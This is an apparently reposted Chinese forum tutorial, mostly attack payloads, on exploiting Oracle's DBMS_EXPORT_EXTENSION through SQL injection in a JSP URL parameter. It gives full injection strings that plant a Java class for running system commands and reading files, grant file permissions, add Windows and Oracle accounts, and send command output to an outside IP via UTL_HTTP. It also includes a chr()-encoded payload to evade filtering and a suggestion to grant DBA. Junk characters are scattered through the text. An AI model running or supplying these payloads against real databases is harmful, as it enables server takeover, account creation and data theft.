以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成 ) U; [9 u$ Y+ f8 z: m+ E% t
3 r: p7 n/ z& L7 b$ [. N( y, X
/xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....) - g; {0 D/ l' a$ M( D
的形式即可。(用" 'a'|| "是为了让语句返回true值) - H4 N6 K- ^; C$ Y+ D9 p
语句有点长,可能要用post提交。
' E2 b' i: o2 l以下是各个步骤: 8 y/ P6 q2 A% Z# ?5 c- y
1.创建包
1 q* q) ~# Q' Y通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:" |: E5 o# i5 v; a
/xxx.jsp?id=1 and '1'<>'a'||( / {5 d4 `$ v; L8 r
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
2 h v& D+ Z5 b% u+ J6 ycreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
, N% s) b& i0 @/ q4 h% @+ ?new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
. l& n* ~; }% F8 p& H4 b}'''';END;'';END;--','SYS',0,'1',0) from dual
+ } V/ y) Y- U' {9 L3 K/ ^1 c7 l)
3 H5 ?% C" r7 W& f------------------------ / z& C+ w! M% V
如果url有长度限制,可以把readFile()函数块去掉,即: ( m8 ~6 }$ y- w! x
/xxx.jsp?id=1 and '1'<>'a'||( * e- y0 b1 t7 R* v/ w
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''! t8 o2 a0 T C. W: d3 c6 D2 d! l" i/ R
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(5 ]) s1 F( ?9 j5 {, V
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
/ q) M, W+ m( [; O+ E7 A}'''';END;'';END;--','SYS',0,'1',0) from dual
. Z+ n+ }2 Z+ g) . z( q6 E& o! H! _
同时把后面步骤 提到的 对readFile()的处理语句去掉。
0 g: O$ b5 a P8 ]! J6 w+ {------------------------------
1 ?- y) X! d) o ^) j2.赋Java权限
+ H. o" g, o& g3 ?! iselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual/ y9 b1 S+ m+ `3 A0 o- u6 e
3.创建函数 3 d( \4 p! B" ]6 |9 g
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
) V& _. Y" s1 C1 ucreate or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual
6 e8 J* T) h: |select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''' Q5 I0 h+ ~! m& }
create or replace function LinxReadFile(filename in varchar2) return varchar2 as language java name ''''''''LinxUtil.readFile(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual" `, c7 @) r, \1 Y- E! P3 O
4.赋public执行函数的权限 / t! r0 u% v, t
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual; ?: k* p: w k
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual B. [2 p' [: Q* V* m& G! `% }6 a
5.测试上面的几步是否成功 ; ~4 i; a* H7 m+ o& o. W
and '1'<>'11'||( . @) R% m9 L# s
select OBJECT_ID from all_objects where object_name ='LINXRUNCMD'
2 f' m$ R% ?$ X& m)
( S2 N+ l# g" r4 b6 ?7 P$ ~- E& kand '1'<>( 8 w4 t* o2 U5 B1 C: F, {
select OBJECT_ID from all_objects where object_name ='LINXREADFILE'
' H. z( Y/ B* W, K; R' ?)
* Y% |3 V% M/ k/ j5 U6.执行命令: 5 V# Y4 c8 X9 R, r8 Q, b
/xxx.jsp?id=1 and '1'<>(
8 l- w! q5 I- Q1 R+ v, i! i1 lselect sys.LinxRunCMD('cmd /c net user linx /add') from dual " W/ a" g0 B' n Z1 W U
; C' K0 b- g1 r4 R7 C* l' g
) ' b' Q! `. b/ D; a- @6 T
/xxx.jsp?id=1 and '1'<>( - L! @1 O0 a+ Y0 v
select sys.LinxReadFile('c:/boot.ini') from dual
7 l9 q/ T1 E9 j2 l1 f1 M8 L9 e2 K5 W2 |
)' Z* O# x# P z! U0 l/ M! t" Q) N
+ w( _" I! y) D2 k注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。
" m% L+ z; A2 k如果要查看运行结果可以用 union : - i3 ~3 m1 |7 v. r. N
/xxx.jsp?id=1 union select sys.LinxRunCMD('cmd /c net user linx /add') from dual/ z- \* |/ f E3 q$ s
或者UTL_HTTP.request(:
$ G) J0 w1 s& ^/ v( ]+ M w/xxx.jsp?id=1 and '1'<>( 4 ^7 E, x! Q% ~
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual' ^. f& F' ~2 x" y* ^$ q1 n
)
" a- C/ ~0 ]: K# k: C9 _/xxx.jsp?id=1 and '1'<>( : @+ l4 S5 I4 q( K' u* ]! r8 ]
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
% |! X- ~8 \( X. Q0 U- {5 W/ x)
; w" O3 }9 I1 `! o- i% E/ X; W注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。
/ ]/ N+ W( G4 b. X+ X$ V( M-------------------- $ h& E4 T" ?7 \4 |7 ^7 @' j# H
6.内部变化
! M% U% r' o% h通过以下命令可以查看all_objects表达改变:
5 k( c- {: M; o3 p( o- \, I0 f! n5 @. mselect * from all_objects where object_name like '%LINX%' or object_name like '%Linx%'
4 a* f9 H$ i# K3 `2 H& \- {7 I7 O! l7.删除我们创建的函数 ! R6 r# g/ o' d& e/ I+ n7 R
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
% D, m+ E3 o ^) m! g; j- Sdrop function LinxRunCMD '''';END;'';END;--','SYS',0,'1',0) from dual ; D7 L; C$ K0 X! f/ E
==================================================== . W+ h8 y- H/ F, D: r
全文结束。谨以此文赠与我的朋友。
: @9 J! Q8 _: h' ?- Klinx - t6 v) p; J# G
124829445 2 A/ f8 t! k- {& [9 q; \
2008.1.12 % x% c) m, U* s- d3 F
linyujian@bjfu.edu.cn - j4 v8 L- _4 {3 g4 Z q$ l
====================================================================== ' [ f# |$ J2 `+ I# z, g/ r
测试漏洞的另一方法: 5 F O3 Q& }& o9 X% X! `7 ^
创建oracle帐号: 0 J& I' B' a5 k$ m# t5 O
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
8 M* ?5 l6 x4 b) m8 @6 h$ HCREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
! W( c* r$ M7 K* J8 @6 ]- o1 ~& r即:
2 f- Q) R5 R- |. X# G2 y, Z5 Uselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
' D2 a; i" d9 Vchr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
; I" T) D6 f6 B9 @3 F$ f9 E确定漏洞存在:
* b5 M% K* [8 G! C) y) g* R1<>( ' x9 ]8 X: {0 a. X
select user_id from all_users where username='LINXSQL' & _- e& ]2 K( q$ D' F! z5 M7 G
)
# s5 w0 E w/ J; Q* e$ F! v给linxsql连接权限: % N5 I1 z% f! e: x: X! p
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''': W! P9 F2 M3 W$ b- f2 w) Y: |/ z1 d
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
8 v% P0 h; ~4 U2 m" S删除帐号:
9 F7 M5 L0 B8 ^( c3 `6 v2 W$ hselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''( C% B$ F0 d# f( |: Z6 A# l6 h
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual * t; t+ C) Z: t, `5 I
====================== ( ]5 I5 `8 h* n% |- Y ~$ L
以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:
$ i" f4 y0 W* w; v# v1.jsp?id=1 and '1'<>( - C1 w# r7 s$ l! q3 {7 E
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''+ }8 d5 O6 Y4 W6 l
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1; end; '''';END;'';END;--','SYS',0,'1',0) from dual
# X# H3 G/ v0 X# v) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE$ o7 d/ b, |( U
)
( {# A. p8 P7 y6 R
6 A! u, Y+ k. q% N
# y) O6 C6 ?0 x3 S: s% X" G3 b' v& ?- \4 |* B
|
发表于 2012-12-18 12:21:48
收藏
支持
反对